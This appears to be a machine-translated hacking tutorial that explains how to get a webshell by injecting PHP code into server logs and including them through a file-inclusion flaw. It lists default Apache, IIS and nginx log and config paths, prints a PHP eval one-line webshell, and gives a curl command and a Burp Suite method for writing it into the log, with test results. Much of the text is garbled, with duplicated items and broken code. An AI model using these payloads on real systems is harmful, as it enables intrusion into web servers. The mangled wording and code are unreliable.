contains log files Getshell I. Overview of exploits that contain log files when we do not have an upload point, and there is no url_allow_include function, we can consider the package containing the server log files. The use of ideas is also relatively simple, when we visit the site, the server log will record our behavior, when we visit the link contains php a word trojan, will also be recorded in the log. when we know the log location of the server, we can go to include this file to get the shell. In fact, the entire "Include log file Exploits" the most critical is to find the log storage "physical path", as long as the log to find the physical storage path, everything can be completed in a step-by-step.
Ii. conditions of exploitation of loopholes
(1) Physical storage path of log
(2) There is a file inclusion vulnerability (3) Curl Command line URL request tool or Burpsuit proxy; (avoid the existence of URL transcoding)
(3) Curl Command line URL request tool or burpsuit agent;
Third, get the log storage path
a) Log default path (1) apache+linux log default path/etc/httpd/logs/access_log or/var/log/httpd/access_log (2) apache+win2003 log default pathD:\xampp\apache\logs\access.log D:\xampp\apache\logs\error.log (3) iis6.0+win2003 default log fileC:\WINDOWS\system32\Logfiles (4) iis7.0+win2003 default log file%systemdrive%\inetpub\logs\logfiles (5) nginx log fileLog files in the user installation directory logs directory with my installation path for example/usr/local/nginx, then my log directory is in/usr/local/nginx/logs +++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
II) Web middleware default configuration
(1) Apache+linux default configuration file /etc/httpd/conf/httpd.conf or index.php?page=/etc/init.d/httpd ( 2) iis6.0+win2003 configuration file c:/windows/system32/inetsrv/metabase.xml (3) Iis7.0+win profile C:\Win Dows\system32\inetsrv\config\applicationhost.config
iv. Practice Test Records
a) tool preparation (1) Curl Command line URL Access ToolOr(2) Burpsuit Agent tool
b) Use the browser to construct a sentence to write the log test record directly (1 ) The browser constructs a sentence error
First, we directly use the browser to construct a "PHP sentence error request Information" Service automatically record this sentence information to the server log file;Concrete Structure Content:http://127.0.0.1/php/1.php? page=<?php @eval ($_post\[123\]);? > (2) test result: Failure The use of the file contains the vulnerability directly to the "Service log file", found that the file contains a vulnerability does not have a normal parsing of the constructed PHP sentence, observed that the construction of a PHP sentence related characters after logging into the log file, the relevant characters are transcoded, resulting in PHP parsing failure, specific failure cause See "Failure reason Analysis" (3) Failure reason analysis The use of a sentence to write to a log file is that Using the browser directly constructs an error message about the requested resource, which contains the basis in the second message. The error message service automatically logs to the log file, but the actual test found that the error message written in the log file occurred character transcoding: log file contents as shown in: Http://127.0.0.1/php/1.php? %3c ? Php%20 @eval ($_post[123]);? %3E&NBSP; "<" ----> Greater than is transcoded for% 3 C ">"----> Less than is transcoded in order to%3e""----> Spaces are transcoded for%20The last word written to the log file becomes%3c?php%[email protected] ($_post[123]); %3e. (4) Failure summary The browser directly constructs the PHP sentence special characters, will be automatically URL escaped by the browser, resulting in the final write to the log file in PHP a sentence contains these special characters, and these transcoding PHP does not perform normal parsing.
III) Curl constructs a sentence, writes a log file Test record
(1 ) Curl constructs a sentence to write to the service log file Construction statement: d:\curl>curl-v "http://127.0
.0.1/php/1.phppage=<?php @eval ($_post\[123\]);? > "? page=<?php @eval ($_post\[123\]);? > " Curl constructs a sentence, you need to pay attention to two points: 1) The requested resource object, need to be enclosed in double quotation marks, otherwise it will error;
2) php sentence in the braces []curl is a special symbol, need to be escaped \[\], or curl will be used when the error; (2) test Result: Success (3) Reasons for SuccessThe Curl command line URL resource request, does not like the browser to the special character URL's transcoding, so intact will request the error the PHP one sentence information writes the service log file. Then we take advantage of the file contains the vulnerability normally contains the parsing of the local server log files entrained in the "php a sentence trojan"; IV) Burpsuit Agent grab packet to change the package construct a sentence to write to the log file (1) burpsuit Agent grab packet, modify the browser transcoding character, write the correct PHP a word trojan to the server log file. (2) Test record: Successthrough the file contains direct access to the service log file, found that a sentence was continued to succeed; (3) Reasons for Successusing Burpsuit to modify the browser to access the transcoding characters, things to install a sentence of our original format recorded in the log file, and can be normal parsing PHP.
Contains log files Getshell
